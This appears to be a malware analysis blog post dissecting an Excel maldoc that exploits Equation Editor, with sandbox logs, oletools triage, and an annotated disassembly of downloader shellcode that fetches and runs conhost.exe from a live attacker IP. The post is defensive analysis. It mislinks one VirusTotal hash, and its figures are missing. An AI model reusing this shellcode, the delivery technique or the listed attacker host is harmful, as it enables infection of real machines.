Analysis of Maldoc exploiting Equation Editor
The sample is an Excel file with the .xls extension.
MD5: 4e9da14a7e07654d673f3785cf58e316
SHA256: 57717904ca09bbae18c3370f06e481a95de630e53a9d8aad52bc7695e8d56a77
VT Link: https://www.virustotal.com/gui/file/cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542
Initial Triage
Let's detonate the sample in a Windows 11 sandbox and check for malicious activity.
Detonating the sample while running noriben.py, we observe the following:
- Process Activity
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/iccvf" [Child PID: 5044]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/iccvf" [Child PID: 5544]
[CreateProcess] svchost.exe:856 > "%ProgramFiles% (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -Embedding" [Child PID: 10280]
[CreateProcess] EQNEDT32.EXE:10280 > "%AppData%\conhost.exe " [Child PID: 7608]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/" [Child PID: 9772]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/" [Child PID: 10044]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/" [Child PID: 6160]
When the file is opened, it downloads a file from 23.94.206.104, which is processed by Equation Editor (EQNEDT32.EXE). EQNEDT32.EXE then executes a file named conhost.exe from %AppData%. We also see rundll32 loading davclnt.dll,DavSetCookie (WebDAV client activity) towards 23[.]94[.]206[.]104.
- File Activity
[CreateFile] EXCEL.EXE:4528 > %LocalAppData%\Microsoft\Windows\INetCache\IE\EOQ0LJX8\microsotballonininsterestedproductwhichlaunchedworldwideforupdaeandupgradethenewthingsonthemarket.doc [SHA256: cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542]
[CreateFile] EQNEDT32.EXE:10280 > %LocalAppData%\Microsoft\Windows\INetCache\IE\EOQ0LJX8\conhost[1].exe [SHA256: fa99b97ae8564e4a6a87d79855b665a462a80a9eeabe5b2d2ccc03a5bea52d10]
[CreateFile] EQNEDT32.EXE:10280 > %AppData%\conhost.exe [SHA256: fa99b97ae8564e4a6a87d79855b665a462a80a9eeabe5b2d2ccc03a5bea52d10]
[DeleteFile] conhost.exe:7608 > %LocalAppData%\Temp\nst3767.tmp
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Sengevders.Pep [SHA256: 4574e94d0f0a27ba498b63b52c1c8be0f1d10dff8b744d3ca85ccbc3a9909846]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\Kreture.cla [SHA256: aa29c94affed7df0fb98bf73cf3c80801ba40709d29a10478385eaf449b96bb8]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\Krimsk.hai [SHA256: 1d44d77a1338511c764d8dfd61098120c448e08a15cbf0d1891dde76ba815566]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\disquiparation.fng [SHA256: bececeb4b1c87a8a7d2ac196c19b4cd4ad9bbfa62698101b82e0d0c8a763086c]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Embraceor\Skibonits\endosseredes.txt [SHA256: 7d82d4289f9fedd9d080cd4d1f65a045aa20c022b98dc3840bee141b9b572118]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Embraceor\Skibonits\eskadronen.ups [SHA256: 7d5604f7815d42a9a432f6836cd7a3c628dd24dbf33995e5dd980a08b69d84e2]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Tagrytteren\Protests\bashfully\zannos.dip [SHA256: 541ddf79e94f50b04efdb22b8dcb3a3c6e7e72db3c91ca75e27d060047a69e14]
[DeleteFile] conhost.exe:7608 > %LocalAppData%\Temp\nsm4051.tmp
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\laartungerne.lnk [SHA256: be44eeb508234ea5a0c9b82ccedde7149f0fcf143743bac0f2838c102abff59c]
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\laartungerne.lnk [SHA256: be44eeb508234ea5a0c9b82ccedde7149f0fcf143743bac0f2838c102abff59c]
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\nsm4051.tmp\System.dll [SHA256: bd046e6497b304e4ea4ab102cab2b1f94ce09bde0eebba4c59942a732679e4eb]
By examining the file activity, it becomes clear that the file microsotballonininsterestedproductwhichlaunchedworldwideforupdaeandupgradethenewthingsonthemarket.doc is downloaded first. conhost.exe is downloaded next and in turn creates various files under %AppData% and the Temp directory.
- Network Activity
Running Wireshark in the background, we can capture the network connections made to 23[.]94[.]206[.]104, which show an RTF file and an EXE file being downloaded.
Further communication observed:
From the process, file and network observations, the following steps are taken when the .xls file is opened:
- Downloads an RTF file from 23[.]94[.]206[.]104
- Equation Editor parses the RTF file, which triggers the vulnerability.
- It downloads an EXE file from 23[.]94[.]206[.]104
- The EXE writes itself to the tmp folder and connects to 23[.]94[.]206[.]104
- However, its execution stops because it detects that it is running in a VM.
Digging deeper
Excel File
The Excel file can be analyzed using OLE tools such as oledump and oledir.
The oledir output shows a stream containing suspicious code; we can dump it later and examine the code.
The oletools output also shows that the Excel file is password protected and that it contains no macro code. To make analysis easier, we can decrypt it with msoffcrypto-crack.py. Malicious workbooks commonly use VelvetSweatshop, the default password Excel tries automatically, so the file opens without prompting the user and the malicious content runs while static scanners only see an encrypted blob.
Running strings on the decrypted file shows a clear-text URL:
This URL, shown in Fig 2, is the one from which the RTF file is downloaded.
RTF File
RTF file downloaded from 23[.]94[.]206[.]104
MD5: bcf1451b6bb1a36c12a0abf8f4875cd4
SHA256: cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542
VT Link: https://www.virustotal.com/gui/file/cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542
The CLSID of Equation Editor is present in the RTF file, which ensures the embedded object is handed to Equation Editor for processing.
Checking with the rtfdump tool, an object is clearly shown:
To dump this object, we can use the rtfobj tool:
This object most likely contains the shellcode that is executed once the vulnerability in Equation Editor is triggered. There are pattern-based tricks for locating shellcode, but they don't always work; here we use scdbg to find and emulate it.
The scdbg output makes it clear that the shellcode downloads conhost.exe from 23[.]94[.]206[.]104.
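The check described above can be scripted. The following is an added example, not code from the original post or from oletools: it decodes plain `\*\objdata` groups, parses the OLE 1.0 wrapper the same way rtfobj does, and looks for the well-known Equation Editor 3.0 CLSID (0002CE02-0000-0000-C000-000000000046) in the embedded data. The sample RTF is constructed for the test and is not the real document.

```python
"""Minimal check for an Equation Editor OLE object embedded in an RTF file."""
import re
import struct
import uuid

# Known CLSID of the Equation Editor 3.0 object class (Equation.3).
# OLE data stores GUIDs little-endian, so that is the byte form we search for.
EQNEDT_CLSID_LE = uuid.UUID("0002CE02-0000-0000-C000-000000000046").bytes_le

# Plain "\*\objdata <hex>" groups only; real samples often obfuscate this part,
# which rtfobj handles and this helper does not.
OBJDATA = re.compile(rb"\\\*\\objdata\s*([0-9a-fA-F\s]+)")


def parse_ole1(blob: bytes) -> tuple[str, bytes]:
    """Split an OLE 1.0 object stream (the decoded \\objdata payload) into
    class name and native data: version, format id, length-prefixed class
    name, topic name, item name, then length-prefixed native data."""
    pos = 8                                              # version + format id
    cls_len = struct.unpack_from("<I", blob, pos)[0]
    pos += 4
    cls = blob[pos:pos + cls_len].rstrip(b"\x00").decode("ascii", "replace")
    pos += cls_len
    for _ in range(2):                                   # topic and item names
        pos += 4 + struct.unpack_from("<I", blob, pos)[0]
    size = struct.unpack_from("<I", blob, pos)[0]
    return cls, blob[pos + 4:pos + 4 + size]


def find_equation_objects(rtf: bytes) -> list[dict]:
    """One record per embedded object: its class name and whether the
    Equation Editor CLSID occurs in its native data."""
    hits = []
    for m in OBJDATA.finditer(rtf):
        blob = bytes.fromhex(re.sub(rb"\s", b"", m.group(1)).decode())
        cls, native = parse_ole1(blob)
        has_clsid = EQNEDT_CLSID_LE in native
        hits.append({"class": cls, "equation_clsid": has_clsid,
                     "suspicious": has_clsid or cls.lower().startswith("equation")})
    return hits


def build_sample_rtf() -> bytes:
    """Constructed test input, not the real sample: an OLE1 wrapper with class
    Equation.3 whose native data carries the CLSID bytes."""
    cls = b"Equation.3\x00"
    native = b"\xd0\xcf\x11\xe0" + EQNEDT_CLSID_LE + b"\x00" * 16  # stand-in payload
    ole1 = (struct.pack("<II", 0x00000501, 0x00000002)
            + struct.pack("<I", len(cls)) + cls
            + struct.pack("<II", 0, 0)
            + struct.pack("<I", len(native)) + native)
    return (b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata "
            + ole1.hex().encode() + b"}}}")


if __name__ == "__main__":
    for hit in find_equation_objects(build_sample_rtf()):
        print(hit)
```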
Shellcode analysis
The scdbg output doesn't give the full picture, so we use x64dbg to dump the shellcode properly.
To debug Equation Editor, we need to create a key named eqnedt32.exe under Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options.
Under it, we create a Debugger entry and set its value to the path of the x64dbg executable.
This ensures that whenever Equation Editor is launched, it is started under the debugger.
After spending some time, we are able to extract the shellcode.
Exploitation of vulnerability
This exploit has been analyzed thoroughly. One can refer to the blogs below for more insight:
- Unit42: https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/
- LastLine: https://www.lastline.com/labsblog/evading-static-analyzers-by-solving-the-equation-editor/
- QuickHeal: https://blogs.quickheal.com/obfuscated-equation-editor-exploit-cve-2017-11882-spreading-hawkeye-keylogger/
Equation Editor doesn't have DEP and ASLR enabled, so its addresses do not change between runs. While analyzing this sample, the function at 0x0041160F is invoked twice: first from 0x00411349 and then from 0x004115D3, at which point the exploit is triggered. The function returns into the exploit code written onto the stack, as shown below.
The code written onto the stack, which jumps to the shellcode:
0019ECB4 | B8 FDBDD749 | mov eax,49D7BDFD |
0019ECB9 | 25 3CBF4526 | and eax,2645BF3C |
0019ECBE | 8B18 | mov ebx,dword ptr ds:[eax] |
0019ECC0 | 8B33 | mov esi,dword ptr ds:[ebx] |
0019ECC2 | BA CEC6F8D4 | mov edx,D4F8C6CE |
0019ECC7 | 81F2 7EA1BED4 | xor edx,D4BEA17E |
0019ECCD | 8B12 | mov edx,dword ptr ds:[edx] |
0019ECCF | 56 | push esi |
0019ECD0 | FFD2 | call edx |
0019ECD2 | 05 3A819EF2 | add eax,F29E813A |
0019ECD7 | 05 557F610D | add eax,D617F55 |
0019ECDC | FFE0 | jmp eax |
The code above obtains the starting address of the global memory block that holds the attacker-crafted RTF object. It then adds a fixed offset to reach the start of the shellcode and jumps to it.
The initial routine of the shellcode decrypts the rest of the shellcode and jumps to it, as shown below:
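The immediates in the stub are split into AND/XOR/ADD chains so that no address appears literally. As an added helper, not part of the original post, the script below folds them: the AND and XOR chains resolve to 0x0045BD3C and 0x004667B0, both in the same 0x0040xxxx range as the function addresses listed above (consistent with the missing ASLR), and the two ADDs after `call edx` net to +0x8F, the shellcode's offset into the buffer the call returns. Reading those two addresses as the global-memory handle and the import used to resolve it is an assumption; the post does not name them.

```python
"""Fold the obfuscated immediates of the stack-pivot stub shown above."""
import re

MASK32 = 0xFFFFFFFF

# Instruction text taken from the x64dbg listing above (addresses and opcode
# bytes dropped), embedded here so the helper runs without a debugger.
PIVOT_STUB = """
mov eax,49D7BDFD
and eax,2645BF3C
mov ebx,dword ptr ds:[eax]
mov esi,dword ptr ds:[ebx]
mov edx,D4F8C6CE
xor edx,D4BEA17E
mov edx,dword ptr ds:[edx]
push esi
call edx
add eax,F29E813A
add eax,D617F55
jmp eax
"""

IMM = re.compile(r"^(mov|and|xor|add)\s+(e[a-d]x|e[sd]i),\s*([0-9A-Fa-f]+)$")
LOAD = re.compile(r"^mov\s+(e[a-d]x|e[sd]i),\s*dword ptr (.+)$")


def fold_constants(listing: str) -> list[tuple[str, str, int, bool]]:
    """Single pass over the stub. Each register is tracked either as a known
    32-bit constant or as an unknown base (memory load / call result) plus a
    known delta. Returns (instruction, register, value, value_is_delta) for
    every instruction whose obfuscated immediate resolves to something concrete."""
    regs: dict[str, tuple] = {}   # reg -> ("const", v) or ("sym", base, delta)
    out = []
    for line in (l.strip() for l in listing.splitlines() if l.strip()):
        m = IMM.match(line)
        if m:
            op, reg, imm = m.group(1), m.group(2), int(m.group(3), 16)
            cur = regs.get(reg)
            if op == "mov":
                regs[reg] = ("const", imm)
            elif cur is None:
                continue                          # nothing known about reg yet
            elif cur[0] == "const":               # fully foldable chain
                v = {"and": cur[1] & imm, "xor": cur[1] ^ imm,
                     "add": (cur[1] + imm) & MASK32}[op]
                regs[reg] = ("const", v)
                out.append((line, reg, v, False))
            elif op == "add":                     # unknown base: fold the offset
                regs[reg] = ("sym", cur[1], (cur[2] + imm) & MASK32)
                out.append((line, reg, regs[reg][2], True))
        elif LOAD.match(line):                    # memory read: contents unknown
            reg, src = LOAD.match(line).groups()
            regs[reg] = ("sym", src, 0)
        elif line.startswith("call"):             # return value arrives in eax
            regs["eax"] = ("sym", "retval of " + line, 0)
    return out


if __name__ == "__main__":
    for insn, reg, value, is_delta in fold_constants(PIVOT_STUB):
        kind = "offset from unknown base" if is_delta else "constant"
        print(f"{insn:<20} -> {reg} = {value:#010x} ({kind})")
```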
pop eax                          # eax = starting address of the shellcode
add eax,259                      # eax = first encrypted dword
lea ebx,dword ptr ds:[eax+281]   # ebx = end of the encrypted region
imul ecx,ecx,0                   # ecx = 0 (obfuscated zeroing of the key)
loc_a:
imul ecx,ecx,C231DF5             # key = key * C231DF5 + CD5B387 (mod 2^32)
add ecx,CD5B387
pushfd                           # junk block: eax and the flags are saved,
push eax                         # mangled and restored, so nothing changes
add eax,48A0
lea eax,dword ptr ds:[eax+2795]
sub eax,14F3
lea eax,dword ptr ds:[eax+22A3]
pop eax
popfd
xor dword ptr ds:[eax],ecx       # decrypt one dword in place
add eax,4
cmp eax,ebx
jb loc_a                         # loop until the whole region is decrypted
sub esp,22C
call 4e31489                     # execution continues in the decrypted portion
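The loop above is an LCG-keyed XOR: ECX starts at zero, each iteration computes ecx = ecx * 0xC231DF5 + 0xCD5B387 (mod 2^32) and XORs one dword with it, so the first key is simply 0xCD5B387. The following Python emulation is an added example, not code from the original post; the constants and the 0x259/0x281 offsets come from the listing, while the buffer contents are constructed for the test.

```python
"""Emulation of the shellcode's first-stage decryption loop (LCG-keyed XOR)."""

MASK32 = 0xFFFFFFFF
LCG_MULT = 0x0C231DF5   # imul ecx,ecx,C231DF5
LCG_ADD = 0x0CD5B387    # add ecx,CD5B387
REGION_OFF = 0x259      # add eax,259        (start of the encrypted bytes)
REGION_LEN = 0x281      # lea ebx,[eax+281]  (ebx = end pointer)


def lcg_keystream(seed: int = 0):
    """Yield the 32-bit XOR keys in the order the loop produces them.
    The key is updated *before* each XOR, so the first key equals LCG_ADD."""
    ecx = seed & MASK32
    while True:
        ecx = (ecx * LCG_MULT + LCG_ADD) & MASK32
        yield ecx


def lcg_xor(blob: bytes, offset: int = REGION_OFF, length: int = REGION_LEN) -> bytes:
    """Run the loop over a copy of `blob` and return it.

    Mirrors the code exactly: eax walks from offset while eax < offset+length,
    XORing one little-endian dword per step. Since 0x281 is not a multiple of
    four, the final dword straddles the end of the region, so the buffer must
    extend at least three bytes past it. XOR is symmetric, so the same routine
    both encrypts and decrypts.
    """
    end = offset + length
    data = bytearray(blob)
    keys = lcg_keystream()
    pos = offset
    while pos < end:
        if pos + 4 > len(data):
            raise ValueError("buffer too short for the loop's 4-byte accesses")
        dword = int.from_bytes(data[pos:pos + 4], "little") ^ next(keys)
        data[pos:pos + 4] = dword.to_bytes(4, "little")
        pos += 4
    return bytes(data)


def build_sample() -> bytes:
    """Constructed input laid out like the shellcode (not real data): filler up
    to REGION_OFF, a UTF-16LE marker repeated through the region, then a tail."""
    marker = "kernel32".encode("utf-16-le")
    region = (marker * (REGION_LEN // len(marker) + 2))[:REGION_LEN + 3]
    return b"\x90" * REGION_OFF + region + b"\xcc" * 16


def roundtrip_ok() -> bool:
    """Encrypt the constructed plaintext, decrypt it again, compare."""
    plain = build_sample()
    cipher = lcg_xor(plain)
    return cipher != plain and lcg_xor(cipher) == plain


if __name__ == "__main__":
    print(f"first XOR key: {next(lcg_keystream()):#010x}")
    print("round trip:", roundtrip_ok())
```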
After letting the decryption routine run, we can dump the shellcode and analyze it in Ghidra. Code and data are interleaved, which confuses the decompiler; by carefully walking through it we can separate the two.
Cleaned and decrypted shellcode:
LAB_00000464 XREF[2]: 0000038d(j), 0000043c(j)
00000464 39 d8 CMP EAX,EBX
00000466 0f 82 b7 JC LAB_00000323
fe ff ff
0000046c 81 ec 2c SUB ESP,0x22c
02 00 00
00000472 e8 12 00 CALL FUN_00000489 undefined FUN_00000489()
00 00
00000477 6b 00 65 unicode u"kernel32"
00 72 00
6e 00 65
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000489()
FUN_00000489 XREF[1]: 00000472(c)
00000489 e8 7b 01 CALL FUN_00000609 undefined FUN_00000609(undefined
00 00
0000048e 89 c3 MOV EBX,EAX
00000490 e8 0d 00 CALL FUN_000004a2 undefined FUN_000004a2()
00 00
00000495 4c 6f 61 ds "LoadLibraryW"
64 4c 69
62 72 61
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000004a2()
FUN_000004a2 XREF[1]: FUN_00000489:00000490(c)
000004a2 53 PUSH EBX
000004a3 e8 da 01 CALL FUN_00000682 undefined FUN_00000682(undefined
00 00
000004a8 89 c7 MOV EDI,EAX
000004aa e8 0f 00 CALL FUN_000004be undefined FUN_000004be()
00 00
000004af 47 65 74 ds "GetProcAddress"
50 72 6f
63 41 64
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000004be()
FUN_000004be XREF[1]: FUN_000004a2:000004aa(c)
000004be 53 PUSH EBX
000004bf e8 be 01 CALL FUN_00000682 undefined FUN_00000682(undefined
00 00
000004c4 89 c6 MOV ESI,EAX
000004c6 e8 1a 00 CALL FUN_000004e5 undefined FUN_000004e5()
00 00
000004cb 45 78 70 ds "ExpandEnvironmentStringsW"
61 6e 64
45 6e 76
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000004e5()
FUN_000004e5 XREF[1]: FUN_000004be:000004c6(c)
000004e5 53 PUSH EBX
000004e6 ff d6 CALL ESI
000004e8 68 04 01 PUSH 0x104
00 00
000004ed 8d 54 24 08 LEA EDX,[ESP + 0x8]
000004f1 52 PUSH EDX
000004f2 e8 2c 00 CALL FUN_00000523 undefined FUN_00000523()
00 00
000004f7 25 00 41 unicode u"%APPDATA%\\conhost.exe"
00 50 00
50 00 44
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000523()
FUN_00000523 XREF[1]: FUN_000004e5:000004f2(c)
00000523 ff d0 CALL EAX
00000525 e8 0e 00 CALL FUN_00000538 undefined FUN_00000538()
00 00
0000052a 55 00 72 unicode u"UrlMon"
00 6c 00
4d 00 6f
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000538()
FUN_00000538 XREF[1]: FUN_00000523:00000525(c)
00000538 ff d7 CALL EDI
0000053a e8 13 00 CALL FUN_00000552 undefined FUN_00000552()
00 00
0000053f 55 52 4c ds "URLDownloadToFileW"
44 6f 77
6e 6c 6f
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000552()
FUN_00000552 XREF[1]: FUN_00000538:0000053a(c)
00000552 50 PUSH EAX
00000553 ff d6 CALL ESI
00000555 6a 00 PUSH 0x0
00000557 6a 00 PUSH 0x0
00000559 8d 54 24 0c LEA EDX,[ESP + 0xc]
0000055d 52 PUSH EDX
0000055e e8 4c 00 CALL FUN_000005af undefined FUN_000005af()
00 00
00000563 68 00 74 unicode u"http://23.94.206.104/9080/conhost.exe"
00 74 00
70 00 3a
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000005af()
FUN_000005af XREF[1]: FUN_00000552:0000055e(c)
000005af 6a 00 PUSH 0x0
000005b1 ff d0 CALL EAX
000005b3 e8 10 00 CALL FUN_000005c8 undefined FUN_000005c8()
00 00
000005b8 73 00 68 unicode u"shell32"
00 65 00
6c 00 6c
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000005c8()
FUN_000005c8 XREF[1]: FUN_000005af:000005b3(c)
000005c8 ff d7 CALL EDI
000005ca e8 0e 00 CALL FUN_000005dd undefined FUN_000005dd()
00 00
000005cf 53 68 65 ds "ShellExecuteW"
6c 6c 45
78 65 63
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000005dd()
FUN_000005dd XREF[1]: FUN_000005c8:000005ca(c)
000005dd 50 PUSH EAX
000005de ff d6 CALL ESI
000005e0 6a 01 PUSH 0x1
000005e2 6a 00 PUSH 0x0
000005e4 6a 00 PUSH 0x0
000005e6 8d 54 24 10 LEA EDX,[ESP + 0x10]
000005ea 52 PUSH EDX
000005eb 6a 00 PUSH 0x0
000005ed 6a 00 PUSH 0x0
000005ef ff d0 CALL EAX
000005f1 e8 0c 00 CALL FUN_00000602 undefined FUN_00000602()
00 00
000005f6 45 78 69 ds "ExitProcess"
74 50 72
6f 63 65
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000602()
FUN_00000602 XREF[1]: FUN_000005dd:000005f1(c)
00000602 53 PUSH EBX
00000603 ff d6 CALL ESI
00000605 6a 00 PUSH 0x0
00000607 ff d0 CALL EAX
When executed, this part of the shellcode resolves LoadLibraryW, GetProcAddress and ExpandEnvironmentStringsW from kernel32, expands %APPDATA%\conhost.exe, loads UrlMon and calls URLDownloadToFileW to fetch conhost.exe from 23[.]94[.]206[.]104, launches it with ShellExecuteW from shell32 and finally calls ExitProcess, the same actions shown in Fig 14.
The shellcode also contains three further sub-routines that perform the API hashing/lookup: FUN_00000609 walks the PEB loader module list and returns the base of the module whose name matches, FUN_00000631 is the case-insensitive wide-string compare it uses, and FUN_00000682 walks that module's export table to return the address of a named export:
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000609(undefined4 param_1)
undefined4 Stack[0x4]:4 param_1 XREF[1]: 0000061d(R)
FUN_00000609 XREF[1]: FUN_00000489:00000489(c)
00000609 52 PUSH EDX
0000060a 64 8b 15 MOV EDX,dword ptr FS:[0x30]
30 00 00 00
00000611 8b 52 0c MOV EDX,dword ptr [EDX + 0xc]
00000614 83 c2 0c ADD EDX,0xc
LAB_00000617 XREF[1]: 00000628(j)
00000617 8b 12 MOV EDX,dword ptr [EDX]
00000619 8b 4a 30 MOV ECX,dword ptr [EDX + 0x30]
0000061c 51 PUSH ECX
0000061d ff 74 24 0c PUSH dword ptr [ESP + param_1]
00000621 e8 0b 00 CALL FUN_00000631 undefined FUN_00000631(undefined
00 00
00000626 85 c0 TEST EAX,EAX
00000628 74 ed JZ LAB_00000617
0000062a 8b 42 18 MOV EAX,dword ptr [EDX + 0x18]
0000062d 5a POP EDX
0000062e c2 04 00 RET 0x4
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000631(undefined4 param_1, undefined4 pa
undefined4 Stack[0x4]:4 param_1 XREF[1]: 00000632(R)
undefined4 Stack[0x8]:4 param_2 XREF[1]: 00000636(R)
FUN_00000631 XREF[1]: FUN_00000609:00000621(c)
00000631 52 PUSH EDX
00000632 8b 4c 24 08 MOV ECX,dword ptr [ESP + param_1]
00000636 8b 54 24 0c MOV EDX,dword ptr [ESP + param_2]
0000063a 0f b6 01 MOVZX EAX,byte ptr [ECX]
LAB_0000063d XREF[1]: 00000679(j)
0000063d 66 85 c0 TEST AX,AX
00000640 74 39 JZ LAB_0000067b
00000642 66 3b 02 CMP AX,word ptr [EDX]
00000645 74 29 JZ LAB_00000670
00000647 66 83 f8 61 CMP AX,'a'
0000064b 72 06 JC LAB_00000653
0000064d 66 83 f8 7a CMP AX,'z'
00000651 76 0c JBE LAB_0000065f
LAB_00000653 XREF[1]: 0000064b(j)
00000653 66 83 f8 41 CMP AX,'A'
00000657 72 13 JC LAB_0000066c
00000659 66 83 f8 5a CMP AX,'Z'
0000065d 77 0d JA LAB_0000066c
LAB_0000065f XREF[1]: 00000651(j)
0000065f 66 83 f0 20 XOR AX,0x20
00000663 66 3b 02 CMP AX,word ptr [EDX]
00000666 74 02 JZ LAB_0000066a
00000668 eb 02 JMP LAB_0000066c
LAB_0000066a XREF[1]: 00000666(j)
0000066a eb 04 JMP LAB_00000670
LAB_0000066c XREF[3]: 00000657(j), 0000065d(j),
00000668(j)
0000066c 31 c0 XOR EAX,EAX
0000066e eb 0e JMP LAB_0000067e
LAB_00000670 XREF[2]: 00000645(j), 0000066a(j)
00000670 83 c1 02 ADD ECX,0x2
00000673 83 c2 02 ADD EDX,0x2
00000676 0f b6 01 MOVZX EAX,byte ptr [ECX]
00000679 eb c2 JMP LAB_0000063d
LAB_0000067b XREF[1]: 00000640(j)
0000067b 83 c8 01 OR EAX,0x1
LAB_0000067e XREF[1]: 0000066e(j)
0000067e 5a POP EDX
0000067f c2 08 00 RET 0x8
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000682(undefined4 param_1, undefined4 pa
undefined4 Stack[0x4]:4 param_1 XREF[1]: 00000686(R)
undefined4 Stack[0x8]:4 param_2 XREF[1]: 000006ad(R)
FUN_00000682 XREF[2]: FUN_000004a2:000004a3(c),
FUN_000004be:000004bf(c)
00000682 53 PUSH EBX
00000683 52 PUSH EDX
00000684 56 PUSH ESI
00000685 57 PUSH EDI
00000686 8b 54 24 14 MOV EDX,dword ptr [ESP + param_1]
0000068a 8b 42 3c MOV EAX,dword ptr [EDX + 0x3c]
0000068d 8d 44 02 78 LEA EAX,[EDX + EAX*0x1 + 0x78]
00000691 8b 00 MOV EAX,dword ptr [EAX]
00000693 01 d0 ADD EAX,EDX
00000695 50 PUSH EAX
00000696 8b 48 18 MOV ECX,dword ptr [EAX + 0x18]
00000699 8b 58 20 MOV EBX,dword ptr [EAX + 0x20]
0000069c 01 d3 ADD EBX,EDX
0000069e 30 c0 XOR AL,AL
LAB_000006a0 XREF[1]: 000006df(j)
000006a0 85 c9 TEST ECX,ECX
000006a2 74 3d JZ LAB_000006e1
000006a4 51 PUSH ECX
000006a5 8b 0b MOV ECX,dword ptr [EBX]
000006a7 8d 0c 11 LEA ECX,[ECX + EDX*0x1]
000006aa 89 cf MOV EDI,ECX
000006ac 57 PUSH EDI
000006ad 8b 74 24 24 MOV ESI,dword ptr [ESP + param_2]
000006b1 31 c9 XOR ECX,ECX
000006b3 49 DEC ECX
000006b4 f2 ae SCASB.RE ES:EDI
000006b6 f7 d1 NOT ECX
000006b8 5f POP EDI
000006b9 f3 a6 CMPSB.REPE ES:EDI,ESI
000006bb 75 1d JNZ LAB_000006da
000006bd 59 POP ECX
000006be 58 POP EAX
000006bf 2b 48 18 SUB ECX,dword ptr [EAX + 0x18]
000006c2 f7 d9 NEG ECX
000006c4 8b 58 24 MOV EBX,dword ptr [EAX + 0x24]
000006c7 01 d3 ADD EBX,EDX
000006c9 0f b7 1c 4b MOVZX EBX,word ptr [EBX + ECX*0x2]
000006cd 8b 40 1c MOV EAX,dword ptr [EAX + 0x1c]
000006d0 8d 04 98 LEA EAX,[EAX + EBX*0x4]
000006d3 8b 04 10 MOV EAX,dword ptr [EAX + EDX*0x1]
000006d6 01 d0 ADD EAX,EDX
000006d8 eb 0c JMP LAB_000006e6
LAB_000006da XREF[1]: 000006bb(j)
000006da 83 c3 04 ADD EBX,0x4
000006dd 59 POP ECX
000006de 49 DEC ECX
000006df eb bf JMP LAB_000006a0
LAB_000006e1 XREF[1]: 000006a2(j)
000006e1 31 c0 XOR EAX,EAX
000006e3 83 c4 04 ADD ESP,0x4
LAB_000006e6 XREF[1]: 000006d8(j)
000006e6 5f POP EDI
000006e7 5e POP ESI
000006e8 5a POP EDX
000006e9 5b POP EBX
000006ea c2 08 00 RET 0x8
000006ed 6e 3d d4
Once the shellcode has finished executing, conhost.exe has been dropped into the %APPDATA% folder (the path the shellcode expands above).
conhost.exe
MD5: 8ae5d58be1f0e18dcf150b83939c0f00
SHA256: 5c402005820d458af51125cc3fde9c0870a321ad314fa4a8de2f7dea382bdd6b
VT Link: https://www.virustotal.com/gui/file/5c402005820d458af51125cc3fde9c0870a321ad314fa4a8de2f7dea382bdd6b
A preliminary analysis shows that the file is an NSIS installer that executes a shellcode. It appears to be GuLoader, which deserves its own separate blog post.